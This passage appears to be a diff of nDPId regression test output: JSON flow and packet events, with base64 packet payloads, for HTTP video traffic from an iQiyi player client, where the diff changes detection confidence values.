xBYB3Ua5BHRbTeNFQLdJumgB3aaTJiEloNtaLvGMi6jLRgHdTrkEdDvnEtDtV8wF3Q5zkx2goNvhgGQ3KugOOCCTgO7gXAK6Q3MJ6I6WS0B3XDEXdKlcsRd4qdSpZ2sCXyoy4egTbgIFYCqWhpWBMJWea4CYCKeJZB8YGBPVXAPIRHmYGygTXbEZmImu2Oyc6xWbnXO9YrNzrldsds6otxmf5pxRcFONc0bFTTXOGSU31Thn1NxU45xRdFONc0bVzU6RzTnzSFN6c84ozek5zjmjNqca54zinGm6c0Z1bkmG685ZcJrINM4ZxTfVOGeldJ9256yca5yzaq5xztp+07y2WK+9gDdRX59OR++dLu2Cd0vve4JaK7qpoLCCS2Wy8Htn0uHJGipAhNHRUTwH"} 01353{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1467353156700,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":721,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":721,"pkt_l4_len":687,"thread_ts_msec":1467353156700,"pkt":"ABxCjnAxTF4M6gNlCABFAALD\/f5AADgGxVbfGmoUwKhzCABQxTgCs2BB2CN2nFAYAB9NTQAAeAj6KkVzGFgBGjLKoHgWsNDOg9EyBWMg4qw3sngWxFvTJslqEW1dOtsIZ\/G2YAiauUTisVZE0efGwzjXWg05LdZ4rAky0eBYc4m1ISOZy2PN0IHWZC6PtYYzQuJG8j0ND\/TECQTGtXRrmc2gXLGqInHIeH+AZh3hH4eENwhVsfKSjAPO1cTSYzk4VwRGT0LHe4TarWqyLm8S6mgVURj6q4IzFzPKNODMJE042ZbgzNQZongucObqtx3iTeOdAgtOFElsMDiz4j7IiGOewZkNmDWZyzNFp1ZHvEUZnLk3hGq8dm8XeCg2YczZ+wUeo3ON9wWDs+AA03qiAWdBguyZBpyFEaoU8\/GeQWCxJqlYwFm0ElwW+tS7BtGB8In5eNsgxoYYisfxnNwQiUliF8\/KHRWxxZwFnLGTCyWxIc55GI5LybrAWQsivsW+EHBWpMMucU7w7kGRWyyJeW8flHELMtOAswKQchyrCs6qvbWEs4Kz2mjW4n2q4IzsMyyJDQVn3LPtqKOhTxWcdXQc7RMNOFtBRUl84T0EvFVRbcO5vIcwFIPOsU8NnJExccMztsd7CARqqdlc4IxwNkRibA84m1Rl7rEGnA1No1kcPwbOptwRi\/E44GyK5JL0auaczVRLvE\/NOTdmsdhm7yG8mHJSC5pz7grS8T5tznl40Y3X3pwzVoX9E669gXMrSszJXODcCF1fS8YBZ9yrRE6I97v3EKimuN8fx2ED54ZUh6iPbQbnJlpQLEON9xDNzxJJTvAeopn2mnDu4Nya74w45js4t45NmNQ47yFa70xJ7u3OefiZN1kXOHesvIxf4\/Dy8OXXvmF7+\/b4wXuLdx\/fPY3AD+9f8Jzp8vDGHzT9Byu2GoeKGgAADQowDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156959,"flow_last_seen":1467353156959,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1467353156959,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00719{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1467353156959,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1467353156959,"pkt":"TF4M6gNlABxCjnAxCABFAADvDvNAAIAGMe3AqHMId7wNvMU5AFAa+1ILYx41VVAYAQTDtAAAR0VUIC9rIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBwZGF0YS52aWRlby5xaXlpLmNvbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156959,"flow_last_seen":1467353156959,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1467353156959,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/k","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156959,"flow_last_seen":1467353156959,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1467353156959,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/k","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00955{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1467353156998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":430,"pkt_l4_len":396,"thread_ts_msec":1467353156998,"pkt":"ABxCjnAxTF4M6gNlCABFAAGgqmFAADQG4c13vA28wKhzCABQxTljHjVVGvtS0lAYAB+FPAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtTGVuZ3RoOiAyMDQNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCnsidCI6IjE0NjczNTMxNTYiLCJtIjoiZWMyZmQ2Njc4YTM1N2MyMDhkNTE4NmIzYzM0MjI0NmJlZTQ0YzUwY2U3MDgzOTNlIiwidSI6ImVjMmZkNjY3OGEzNTdjMjBmNTVhODJlZDYwZjYzZjk2Y2QyMDlhMWQ4OGI3ODQyNSIsImkiOiIyMjAuMTgxLjEwOS4zMyIsImsiOiJlYzJmZDY2NzhhMzU3YzIwNjI1MTY2M2U4NGQ3MDFkOTlkYjQyZTUxY2I5MWM1MzkifQ=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157063,"flow_last_seen":1467353157063,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1467353157063,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1467353157063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"thread_ts_msec":1467353157063,"pkt":"TF4M6gNlABxCjnAxCABFAAFXDwhAAIAGMXDAqHMId7wNvMU6AFAWZyP1RIzmWFAYAQR4owAAR0VUIC8yZWZjOGNkNWZiZTBmNGVlNDk4ZmIxYzJmYzFkZThiNi92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2PyZ0bj0xMzc3MTkgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IHBkYXRhLnZpZGVvLnFpeWkuY29tDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157063,"flow_last_seen":1467353157063,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1467353157063,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?&tn=137719","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157063,"flow_last_seen":1467353157063,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1467353157063,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?&tn=137719","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 01021{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1467353157103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":479,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":479,"pkt_l4_len":445,"thread_ts_msec":1467353157103,"pkt":"ABxCjnAxTF4M6gNlCABFAAHRefhAADQGEgZ3vA28wKhzCABQxTpEjOZYFmclJFAYAB\/Y6wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjUyDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJiZ0bj0xMzc3MTkmdXVpZD03NmEzMDg1YS01Nzc2MDg0NC1kZSIsImUiOiIwIn0="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157138,"flow_last_seen":1467353157138,"flow_idle_time":7580000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":372,"midstream":1,"thread_ts_msec":1467353157138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1467353157138,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":426,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":426,"pkt_l4_len":392,"thread_ts_msec":1467353157138,"pkt":"TF4M6gNlABxCjnAxCABFAAGcDxlAAIAGbTXAqHMI3xpqQsU7AFAuAjEcSma44VAYAQTWMgAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSYmdG49MTM3NzE5JnV1aWQ9NzZhMzA4NWEtNTc3NjA4NDQtZGUgSFRUUC8xLjENClJhbmdlOiBieXRlcz0wLTQwOTU5DQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiAyMjMuMjYuMTA2LjY2DQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDo1MDA0OTQ2MDBfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157138,"flow_last_seen":1467353157138,"flow_idle_time":7580000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":372,"midstream":1,"thread_ts_msec":1467353157138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157138,"flow_last_seen":1467353157138,"flow_idle_time":7580000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":372,"midstream":1,"thread_ts_msec":1467353157138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 02177{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1467353157142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353157142,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUui5AADgGBqjfGmpCwKhzCABQxTtKZsK5LgIykFAQAB\/uTwAAXABAYzwo9cKPXABAY3wo9cKPXABAY7wo9cKPXAAACQAACKIJAAAyAAAAAAAAABcAAAAAAWQAH\/\/hAB1nZAAfrFYkCgL\/lmoCAgKAAAADAIAAABlHjBjFQAEABWjomvLAAAAAPQgAAAkAAAAAAAAArwATkFblpUgAAAAAFAkAbwgAAAAAAAAAFwEAAFAAAG7\/ZYiCABX\/95xkfm3FH8zfxiVyZItj2+QvcPG\/css\/ZW+K7oKmOXqvyof6+MpsbuBrR3NlYBBVWVRq3WcvPz43KJn6OOq7wUatnW33K69XETXFsUoSgXdN7o0kq4w+hJrrFVm3jhsmgXWVk6qs6hebWuZRXfCylsvlyYQvoo8ujkxwf\/jOPhyl6i\/pTDKbDQZOrGmk9iGos+6hcPjtrVmq5rC28bSpDQb\/l3J+48zXTAIJQ0eBYWXFdgZPT7ei\/1f\/9\/tmNrD8GxGJp2OeeHzKlWg0+2iCixox6opp5+CbF3ew+UCOGdg3U\/5oVyFXyPX7+O0Is6zwfWwGCWJoC6\/zQa49qCQPS9W27Dn4e7vsWHcsLdg3UHzR4Z1JuDFBW7ue0EA3sC0gP\/mqqJuTdXptxBOJRjQ63vSnOV7PtDcJs4A7oWz2JzmEh+VbAw2U5760xCgZf0h+IR4GdMhaD57XDY8NdoZSDUzKAjvVKzHkc\/gdXpR0l6TIGuQcP2n5BFznR2iYeCE\/miwzmIeVW7avmSkaYobdmdMxT40yLpSDo7E8P+71xqJEqUUh6vFl9rz126Cgazh0LClcgaFaNKcZScAJKPrVP1o7kkOIcKwxW2CdOD77SH4zyVYWD9ULtNPIZ77Kl\/LYJQ8L2R419x+V6vNClYH7FDNYQst\/D12fjQ\/m+4yqq8ANYgNFZAXKlC8uKiIfcH\/TAErY7s8c2cJx1lhY3xTKhpLrPcsLU9UsA+Oip34KoUwvW3F5sUP0n2c\/KNlUH5ayGqegy5bryGeYm\/zuaor3RjqVC+afHCqaNQNUM+bdihsi6\/dYDdiuHkznFARXAj+HmRzPclqFdQs0umlOh+4nrXrTgUTsq6Mijt5YgP1vOKM5AtjEldVCDmGr1tU5uzTP\/wOgMtD4fsuENAnY849iMY16mjQC8PBzOazume30AYsAvNe5umLe2Jg9g1q77PVd7s5Hu\/6sIJWIf7my9bXHqgu1vXqQE6ohulSfKXSbeWRxV1zDne\/VQKrMqsiN5thBJ6eGrmP690VCEON3vIc3K8eMxOBEG1sH2gt0\/QY+qtme7NqWlgnah6YGN282gbUWFJTA8lul4VGFodu6rBHcO4b\/OZ2Vgodz1eVa7Rvhlz0zeO\/YLtQjl7fwTfVY1piKLJlsXBuH5KXSLNolBVVHCVrAQmkekZvhiLsm\/G4SGTer+1uPrS5m3ZHSe234ovyt+yHtfZCEP\/\/gOVJ5LO7C7uAyroC7rFx6lIcBOyO9mnt4Fi0rv6nmI9Iuf1\/XjKYeJJ3hPNphBZXvUwpvdJUyrMP\/WSQf4xrhUZbkn+wcvgAg5Hq\/N\/ilxIaAfekOtHVgU5VwnYm0lrbpwZtnYoLYol2itsi\/Tiny8B2OHcGdfUzCAOCON\/0+\/ipakxXBeRa7CLgs5mjI+rNnEby8whMLuruKRetpD4LDPViHWG\/OwHoZ14S6hpwBDqQ07xh3U7DjW9xs4GqS"} 02162{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1467353157142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353157142,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUui9AADgGBqffGmpCwKhzCABQxTtKZselLgIykFAQAB\/aLgAAopnkFb6w\/Gf9wcd\/TnuexQBjLwWa0uCe9TPr4qE3jsphraOf\/lM4Hhi9NJILTNUPpkUh0lJVsTBg0+IryxSW3IwYySV6wkzB0\/tYDwbO6SOx\/W5mmrffIH5hc9hR+iJYkdxSMJyhs5tL+JX3Z4urkWLC21HQmnbWWhKwwr3IOESy8lC4QLT5bzgZZwV6aylc3BKRGmkWqvo3gveBLOrAMA4JoqHhbMBYA7GEB3n5XVRePARG35OUMCE\/8TDQo0+dLC24GKANopCzYZkvfPVaY0dRDrv50emXg1Cs9WSfVu50aDF7YYVdx5mx545GrUAMEsqIjDQ\/4DCox7xS+Ws\/dwFhUTJ0P8Dx\/xK2lp12JPYf\/zG6tdTYMt3AacBTBvLHFFde\/reBoQaTbZB\/vJdywKaKtIzwqCOs4Q9YPbL8+Pq1VE1FdEBeuONtnWPx9wNuAvH6U\/JENWXsD\/bsjom76483YU\/XZIQUgj30cOEgQwuDamiBln+90aAngeN2nOL6ntmgjdG66Xp5PKfwQlwuGdvacgApEFyIvnfxUhm77eXRcDexRzOKtayXJEIXZt52rm2WbDXx+l2L+n6mDI5HPlSGKuvP84rwmMwhT7yEvzQKbivh5sn9I8EjZx6KaukURUZTKe54jHmLC3Jmf2BKkUKfD+otim\/knbUQxDjsPRmRG1Nf5oF86K6KEl\/nFEI9A5kcjFcko+VuDqw9SWzSXgKad5EYc4r+hlUwt3uzj59viQUjCCWYguaIGZ8C5ZjdSExE6IsY1BXoMFqHoRzfJaDg6uSsFAjJS92cQgN0nWwTaQFWx1m2slB35iQ1wft22PbPDl49icFcTFpAz2oY5Pp3lfvj5IUJyUTHt3u8v74exA53o9ooOtbqs2j42om\/zaB3iyhBCsOikAKzbr0K6CxGSwBAWdloUe96BLdalzPNcqhIK0c0YJvH4tBdmDh+5ufseEBw7BGI2ipV6yVNpFO0kDqCajN7YsN05JDg13dAXzY2SAQ5QfKni3cz7N9WhYMt7COKUvI+C0iwIaEB32bniucRrN4HsPO11eCbWDnltN\/+kP2qhoa5r1DcSUAZq6JPm51\/USDg6qO4x\/Vapf6ZVCWehE+KdgGpX4qBTKeA+bV7qois7qvnsCmBXUWPo21DtRYTVMizQCWWQqH0CGGSEtoZ24ZE8Em+sX59yNgKKKnBzY4rxhy1pF8qyBkoHpDm9lBx3JEleYOnrbk5vilJTiHsG0C7im31hM5hXvKl2rEhKIpc+QgsAwc8xEkz7398lWjZRYNmVmvhEG3GTaIjL7zuDYVBFnz\/Ep+CquTSroYI\/KVwc+2ze3Q+yBDcODi+bFdRr\/qJ\/RfL4FgeDb9sduAkPb3xQiixfjLzyzTazf6dzG3+S06aSi8zpu2nZ2pA6Ukh\/FodlR311cw8YfsxYuiSFyYqZDzpce1Qm0XZXnys8qlDnUmjILug1tlJBa1UzH74juRDwgD0Fnwh1MLjNAsmUIrgA0GSsiEjUBU047yfXV\/qzyvQus+1BXKIiklyV0Xin7L0ua0Yj38t6gGn+ytwXAmSh71WYg7o3suhEh2DpzfHKZ9IBKf8gIvOvhTvSepAfXGEaca4phlMY6YIuwsde9HzRk9q6m3wLv6MKf1l9nyMKAHgaDMdK68E7LAU50IjtX2yCF8K"} -01059{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1055,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353157138,"flow_last_seen":1467353157142,"flow_idle_time":7580000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2892,"flow_avg_l4_payload_len":964,"midstream":1,"thread_ts_msec":1467353157142,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01059{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1055,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353157138,"flow_last_seen":1467353157142,"flow_idle_time":7580000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2892,"flow_avg_l4_payload_len":964,"midstream":1,"thread_ts_msec":1467353157142,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157433,"flow_last_seen":1467353157433,"flow_idle_time":7580000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":335,"midstream":1,"thread_ts_msec":1467353157433,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1467353157433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":389,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":389,"pkt_l4_len":355,"thread_ts_msec":1467353157433,"pkt":"TF4M6gNlABxCjnAxCABFAAF3D2lAAIAGOZbAqHMIb84NA8U8AFD\/xaF06zAEllAYAQRGTAAAR0VUIC8yZWZjOGNkNWZiZTBmNGVlNDk4ZmIxYzJmYzFkZThiNi92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P3F5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiBIVFRQLzEuMQ0KSG9zdDogcGRhdGEudmlkZW8ucWl5aS5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBIQ0ROQ2xpZW50X1dJTlBDO2xpYmN1cmwvNy4yNi4wIE9wZW5TU0wvMS4wLjFnIHpsaWIvMS4yLjU7UUsvMTAuMC4wLjI5Mw0KDQo="} 